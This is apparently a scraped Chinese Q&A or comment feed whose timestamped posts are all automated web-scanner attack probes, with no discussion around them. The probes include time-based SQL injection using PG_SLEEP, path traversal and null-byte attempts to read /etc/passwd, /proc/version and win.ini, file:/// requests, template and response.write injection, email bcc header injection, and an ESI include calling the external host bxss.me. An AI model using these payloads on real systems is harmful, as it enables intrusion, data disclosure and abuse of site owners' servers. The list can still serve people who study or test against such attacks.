fS7kLG97') OR 724=(SELECT 724 FROM PG_SLEEP(15))--

小问 2025-06-06 07:32:49

%2fetc%2fpasswd

小问 2025-06-06 07:32:47

/etc/passwd

小问 2025-06-06 07:32:45

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

小问 2025-06-06 07:32:43

### ~~1.

小问 2025-06-06 07:32:43

/../..//../..//../..//../..//../..//etc/passwd%00.jpg

小问 2025-06-06 07:32:42

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

小问 2025-06-06 07:32:40

../../../../../../../../../../etc/passwd%00.jpg

小问 2025-06-06 07:32:39

tJy09kVP' OR 743=(SELECT 743 FROM PG_SLEEP(15))--

小问 2025-06-06 07:32:38

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

小问 2025-06-06 07:32:37

../../../../../../../../../../../../../../../proc/version

小问 2025-06-06 07:32:35

file:///etc/passwd

小问 2025-06-06 07:32:34

../../../../../../../../../../../../../../windows/win.ini

小问 2025-06-06 07:32:32

### ~~1.

小问 2025-06-06 07:32:32

../../../../../../../../../../../../../../etc/passwd

小问 2025-06-06 07:32:29

12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

小问 2025-06-06 07:32:27

-1)) OR 427=(SELECT 427 FROM PG_SLEEP(15))--

小问 2025-06-06 07:32:20

"+response.write(9423510*9379819)+"

小问 2025-06-06 07:32:19

to@example.com>%0d%0abcc:009247.15-5503.15.9c362.20245.2@bxss.me

小问 2025-06-06 07:32:18

### ~~1.

小问 2025-06-06 07:32:17

${9999063+10000484}

小问 2025-06-06 07:32:17

'+response.write(9423510*9379819)+'

小问 2025-06-06 07:32:15

%0abcc:009247.15-5499.15.9c362.20245.2@bxss.me

小问 2025-06-06 07:32:14

<esi:include src="http://bxss.me/rpb.png"/>

小问 2025-06-06 07:32:14

response.write(9423510*9379819)